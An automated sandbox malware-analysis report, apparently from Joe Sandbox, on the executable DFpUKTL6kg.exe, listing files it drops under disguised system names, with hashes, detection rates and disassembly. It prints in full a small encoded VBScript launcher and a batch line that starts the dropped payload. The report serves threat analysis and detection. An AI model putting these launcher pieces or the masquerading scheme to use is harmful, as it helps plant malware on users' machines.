                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\1b42ae2595212a

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with very long lines (310), with no line terminators
                Category:dropped
                Size (bytes):310
                Entropy (8bit):5.783827059265174
                Encrypted:false
                SSDEEP:6:cFlX+JFh3PDpjXy0zcjRT0UyX93otu2M48jARPoF+5b0cV3ZhNQVJ:Myh3rNX/zcVT0fX9gu2znPC+5b00Cj
                MD5:8EF5C5EA43CD247ED455246995372138
                SHA1:904F66F0E9EFA7EC2A15899D9F2D9D499915386A
                SHA-256:9AAD189C955ACAB48C49AC334B1486D73151BC1B2E4A2D6D589B9C7FE137A695
                SHA-512:06B441D0D5001FADC1F93DE2F83A2454FA322BB4830567192ECD19CE0A0C1C7EA8BDFA548B7AA3A74873664E205AC3ACDFA2ECDC3C05DBC0C2193CA7764C31D6
                Malicious:false
                Preview:xJOThrWTc5CoXqajFGuc5AOJRFt4Ts5GoL3w8kI8s6ak1fLnaiqEZpXw5EBc7bAu959Lwolf8vu9jnSw4GeuB1q8yG14iqBQ5ql5g90w7LGn5YNRvPi07QsIOAXqwr6SudD3CXP4Psw0vDDZ3jISHKTp7dqgmK9QOx2cVUPYAnlOd2WL77wNinKjJY5iqtSEtgl7KkEjUtSejFMFGfjoYwrknTS6YqrQVgf6QZAW3N3yUqAELzcLKnq7yAU1RHKnCCICkPyqeMuK33P7SOvjOfGrziIPFIEvCPwSh7e6Avr73fD5vWjDWl

                C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\5940a34987c991

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):68
                Entropy (8bit):5.149603466091263
                Encrypted:false
                SSDEEP:3:KhIZyAeeAzAtcfAymcvuXIa:KhIZtAsqf7vuXl
                MD5:A6AE8E961055E434C1499682923AB440
                SHA1:EE46AC5F9C1C38A50EB727CCF14C0415AA2D7148
                SHA-256:61B8E293DAD869BACF014BD201CA13B0EFC6144E8D2B6675FFD58342DFAD43E1
                SHA-512:23E90AB12AFDC8C04B9F85DCD79C4CD28C6C777377A09E190B9C4D757D947B7176F78903649140B9CDD7DF7FB868463CA701C08846E0FFE9C8BC56B8DCC6F61E
                Malicious:false
                Preview:FN1FaFCMFIHxk1eFNMkh2jhEeVWBqbeJNeguDgzrLqs0ZmWUXWC9JRKgqwlFsBgon7jG

                C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Recovery\1b42ae2595212a

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with very long lines (535), with no line terminators
                Category:dropped
                Size (bytes):535
                Entropy (8bit):5.869832689957653
                Encrypted:false
                SSDEEP:12:tCuyQwzwqaD625CzGjVibQl5broI+y2rMbWJiP+ge6AITzq2vKy:trGSp5Cz0VYQlh8IAMOe+geRuXKy
                MD5:5A618C519E94FC726840466394CB1B9B
                SHA1:531CBAA9BE90C731463BDC561445D6B774B72E36
                SHA-256:470C82043E01132AA0E3C4C082EC681364234C89B18E3954CED5546E88BF84CF
                SHA-512:CA0F6FA1DE7D98599BC18738E7C7B46F507C4B9BD216A101093DEA085D62CE1779B91EBB4F2746EDF2663414F43919D2738E661E3C1D449535050A23C8AD0383
                Malicious:false
                Preview:IonPpsQpK4ctbxssOteOEMZciHl55grcXIz0Ma0copEuPKFz4Y132cc5PKqiHUtnNAWT72fy3BjZIoNYBwBhpyk5q4lCuSVU6ahPyw1C2D902Cwl7SgVSL8ZZbmDQdDlqPdsG7jP49olytCnHAEbv9BubHzXJxvY9YKnjEe9sQaThXlqY85QZmzqNtQ9IMGHOPlZjZECfFsejrMEgJ8L2e9XidZ0yf1gKTFRvLG842uU3VGfgLc9N4OtPN0FANOANMTQm5SUC9R9tpeNW3UmC2SQEWBiVA8qouGqC03l2I6OnP9ktntG3l7V3DLQ3u9BAkV8jxKg9su45EnyWbyrR1wCxuw9onsIJ5NC4AB5cNHK1CazZX3b5RtJySLyAL1WAlv91k4Va3PEumLuU7jRtQM1LDOlzM4QVvJPRa7zchBCCpYLHbeDmjmuZ3yxWSgN88s9c5c39tzMOJzgpCeYs0ovJZzYmKcJAyDE6ZtL8kE2uZgPDSITxIfIT70DGERzQpLaGvjQSTZHwvAt2kUTCIW

                C:\Recovery\9e8d7a4ca61bd9

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):103
                Entropy (8bit):5.37710226076945
                Encrypted:false
                SSDEEP:3:w3NpyZHDWG1ssBuSc9jpTdNoUyjUtIRpQwr:w9pyZH71nBmVwU+Rplr
                MD5:B7A937B716ACF18EDE37C8FA77CEA757
                SHA1:0FE7EE29FDF8A763ED763204B55CB4527FA0B029
                SHA-256:F15AC923EF83228D7C3D305F7294F097A52E10D2F7FC8793E61046BA5EBB20B4
                SHA-512:183FAB854DB7FC03EC7D61FC726CBFA653F051D1F7CE893C73B9834028235CBAF1D767FF363D13B1DE8FFCB1426F1A754D485872CD56862708A16256FDDD4CA5
                Malicious:false
                Preview:JSs1BdsYVh6HKgt7wHSTHLAkrmOfxhK4exbBkKH2J4kMCbgiKWcdx587SIKYONkxXBmXFrWmAaJMkxhPGqUbFqHjydtcAtn5UxzBzJd

                C:\Recovery\RuntimeBroker.exe

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Recovery\UAhpvIJrmb.exe

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UAhpvIJrmb.exe.log

                Download File
                Process:C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\browsersvc.exe.log

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1740
                Entropy (8bit):5.36827240602657
                Encrypted:false
                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
                MD5:B28E0CCD25623D173B2EB29F3A99B9DD
                SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
                SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
                SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                C:\Windows\L2Schemas\OfficeClickToRun.exe

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Windows\L2Schemas\e6c9b481da804f

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with very long lines (985), with no line terminators
                Category:dropped
                Size (bytes):985
                Entropy (8bit):5.896550841028341
                Encrypted:false
                SSDEEP:24:w5eumDRS2Ukh03IC/3vTMAgyLuGOW7YIzuOUGa2muxT:wodNPUkh03IQ/2yLuUYIzueFmmT
                MD5:2E13F34C7DC4B110B02CE8FFEA525CC3
                SHA1:6CE651AFD031CDD49719D7A68E8A1ABFC312CD50
                SHA-256:D613D030A0BE78A83B4A0C33CBB8D0E681EFA408B699E071DBF94FB83A168945
                SHA-512:26C7751B925985FC0E0DE8F86AED7768A893AF2DEAEE303BC1D2F759CADA92F56B6BB87A36B1C71D760FDB83A2AEB86CF46B9F0D3FB1229E2DECA9F9C2D482C2
                Malicious:false
                Preview:cKQLOIQgLzmC9YAz7nK0cZ3uOE0v0BJR37ErQaoKFATQAfHGaQ5AOagDRg7KReqKqUICTTjg99ucFmts6uVkGIDdaBZude3lTJjqXFwHrYBOpD7owOOhJGDhRplR3yCfFJJ6DDV07O2rHzxXEu7OPWbNFBYrdeN2VgIf4Alt3Xj5NVab1NNI1yPts50BonWcAAWlqSdDJNV2wg9tl7zPRFAhQYx8KkEPAH4N9zvjuK9ndX7L5GaryGK59zURef3jJF1omwuvMQfHFXE3bmCDJXb369NKfdEPQaeXfSjJWpfilDzmuaz2c0Zvo7rmjkPsLP0p2qYJC3re23S3JlZFnMwaAsshk6jvZwWVNJtDBqzjJ53vpyc8KKF8cZpK70jGT5FFg6pA1VD6WNRFz71vdlkOqY2xejFKHtQNzxPtIcGzHIlPHkUA9xmrU1YHD2fRP2zn7DPBsImBfvGhwnp4OFLUHi38ZHqQ6yjPT8RDUTR1KkMiu0VZMlDKqffYKQmlcWEqM1OxVlj5xUJgWVOivQEVvZiyc33ErqZyggW3mhDkBHWWV9CzCEzLSs4wSaVcsfOH5VA08U5OMdToDMcd1ECm1NfxljlMMl1g3PaA8L0rIl8yZQtF71loclPrzNOZttBllwuywcfpOUeQOrYV0gOV9NER9sKv6b8ZjXNmf5TfW5ZIG9dIz3iNeqlXsdyDRtswWFq1evz4Mt9Ey5K9PC6D2v43vz3CGQNmMmvBTloDDnAuqhjwSyxPxp4lKwGo2xy6fX1LKJqnY29OuKNNPGuSc8ygsK0hf9KQzDOTqYmIIJ14qq0Aj3YvDgehiUd9SIIYssYr53g1dlJSH30BU07lkYMTjrvW5n09BcM7RIFqWhScWMapebpcKgxTgEIOIK60vKRoq2uLvRPCGu7WQF1e8Xyeo3bMA1iMlbqM5v8lqdr3RuMvHv7CSb2XVw9xbhK3tDboDvbeHQxeq5M3qqEP3

                C:\chainSurrogate\1b42ae2595212a

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with very long lines (660), with no line terminators
                Category:dropped
                Size (bytes):660
                Entropy (8bit):5.914053342691167
                Encrypted:false
                SSDEEP:12:Zi3OxXOEv10vJG1/TsT+MTRPUv5G6FRnbIrmzxhYQcJhXtM5ScZ2DmE:A3ORv1nc+Md25fFJNSQcJBtG2DH
                MD5:BAD7727817013BE56010728019822593
                SHA1:2C29B00AB29AAA2E2A7BAF4DD9171F3A91234AC1
                SHA-256:E377322FD66D88F48ACA272EB50F82F3CF33CC01519ADF08E2C443A82A05CC61
                SHA-512:6BE86A84E5071B858E5F5154F050EE6A5E6201001F7BFAB2BAD40AACB5B6F0EB10C644AD60B43E0D04DA65CA66C078BC5077694C2FAAD22D94CC6EC862BDF3C7
                Malicious:false
                Preview:pg1d85VA5uoFbDwR5MdMP7DptDMFhiA6iPso9vVGxCbuTU3ZFvQ0q1ZsdMt4tQcWurhMUISJ0WZMfTVYJx9wSKQrzALxBaXhkEAlxrF7cG9TbNMK0Vu5QpDjb0WT7eIa92lbTtlcsCTML6PmyA6qpbQ4AaK7VwA88iUjlv0GtSNOW1Yelte6hbvhlqa2joH5BVOmmqBDK06WOCiJBpVlREagxw84U7hFLRMAmv25sbwreYTiIQ03Sfo75rzzrGsMS1L6zigQxa20SsCYcZwDGoxpnPE46DNlsjZnNWsjukG1nxoNpaWSUpFoDfTkdmTuNQIsTYLFqMTfi6Bzk1Ofq4RCeujrDIGHRWnXp64RPRlIVjGHdd9lXxET9FNiydCiFLOMSoJo77QYTIq5ocNjJftdRUXksVcvPCCJU4yzUUnahp90YS3WQcZkcu48Rj6meeJQFgkunYPy1T6mUhLZbGfwncrkA0iuYB5Cftu1sJt1NlsIxRotYgKY9Xmnz9tx0fZzX4HkwTrSXnjCtjwsMyV21gDIGHCsa6BrL3u3KD7Ey1BVxk3PMAkCJh8118doR82bm100y3iJ0RD9erUgOwfZV9io43BLjTxz9ks6uCaScbL2e8WJo7aeddFnSM552WjhdN948XwLWM63xqK6

                C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat

                Download File
                Process:C:\Users\user\Desktop\DFpUKTL6kg.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):34
                Entropy (8bit):4.2639334294856335
                Encrypted:false
                SSDEEP:3:I50+A553fkAH:I6x58AH
                MD5:C4D1668093627B8BAD684C203127AEA0
                SHA1:6671BC621C55E507B9D04B2574EDF61E392D07CE
                SHA-256:71F60ECEED543DE69425208D9DB31D0D5B371792329D7BA45BA384B0327B7C38
                SHA-512:26CB1B5620D4DA7B5E39E2ED7010BCD85C1087E9079214A6C2A41C84805FF67D0CE923EE76EF3C444BA2E944DC3F19AE6DD271F399C425AAC5EC8C85EDB632A2
                Malicious:false
                Preview:"C:\chainSurrogate\browsersvc.exe"

                C:\chainSurrogate\UAhpvIJrmb.exe

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\chainSurrogate\browsersvc.exe

                Download File
                Process:C:\Users\user\Desktop\DFpUKTL6kg.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe

                Download File
                Process:C:\Users\user\Desktop\DFpUKTL6kg.exe
                File Type:data
                Category:dropped
                Size (bytes):217
                Entropy (8bit):5.785913358013251
                Encrypted:false
                SSDEEP:6:GmvwqK+NkLzWbHE08nZNDd3RL1wQJRe1Rd//7GAFNY7s:G1MCzWLE04d3XBJQDDGAXY7s
                MD5:EE3A4B8D5B9A45AC52FAB507FCDDB2AE
                SHA1:101A1A475BE56C7924374353A9B60D914C0A64F0
                SHA-256:C18B8C22ABE6C0333B1C9A7E7096F8530B9C75213791DF17C67B1DCD609F86C7
                SHA-512:95D9C4FEE2B2760E0CF10EB03D69E48AE8B730B1096756D81D4DCDCACB5DA88642836FF2C52D64216F3FB0E87CBC611F4F4EE1EC8E46746A38EF2CA1151049B2
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Preview:#@~^wAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v,T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJm4mk.?EMDKLlD+&9}E^60WVTOhRx|dt6,`ry+jHC)c4CYrSPZ~~WmV/nUz0AAA==^#~@.

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.372055712987412
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                • Win32 Executable (generic) a (10002005/4) 49.97%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:DFpUKTL6kg.exe
                File size:1'164'929 bytes
                MD5:23a1767d4e77693bd46f3abfcf10e4d7
                SHA1:1be797ac1e5180f8bb51b359b7c8dc88daf2732e
                SHA256:d675f72b0bc010f74a28dfb3401dd69dbae5d21a55624a827fa70d1041367d13
                SHA512:c5cc36fde16459b113165f0269f72bdbe92fcb2695399569e504d6c70f5bc8037b0f7e0cc5d9bb8b1159ead680e2519e7f9081e45d4bc4e92f4508e13d41601d
                SSDEEP:24576:U2G/nvxW3Ww0tpQfgeUO7llNndNogBuHtz4s:UbA30pQZ7tdmh
                TLSH:67454A017E448A11F0191633C2EF450487B4AD526BA6E71F7EBA376E65223B37D1CACB
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

                File Icon

                Icon Hash:1515d4d4442f2d2d

                Static PE Info

                General

                Entrypoint:0x41ec40
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                Entrypoint Preview

                Instruction
                call 00007F68D8B9D719h
                jmp 00007F68D8B9D12Dh
                cmp ecx, dword ptr [0043E668h]
                jne 00007F68D8B9D2A5h
                ret
                jmp 00007F68D8B9D89Eh
                int3
                int3
                int3
                int3
                int3
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007F68D8B90037h
                mov dword ptr [esi], 00435580h
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 00435588h
                mov dword ptr [ecx], 00435580h
                ret
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                lea eax, dword ptr [ecx+04h]
                mov dword ptr [ecx], 00435568h
                push eax
                call 00007F68D8BA043Dh
                pop ecx
                ret
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F68D8B8FFCEh
                push 0043B704h
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F68D8B9FB52h
                int3
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F68D8B9D244h
                push 0043B91Ch
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F68D8B9FB35h
                int3
                jmp 00007F68D8BA1B83h
                jmp dword ptr [00433260h]
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                push 00421EB0h
                push dword ptr fs:[00000000h]

                Rich Headers

                Programming Language:
                • [ C ] VS2008 SP1 build 30729
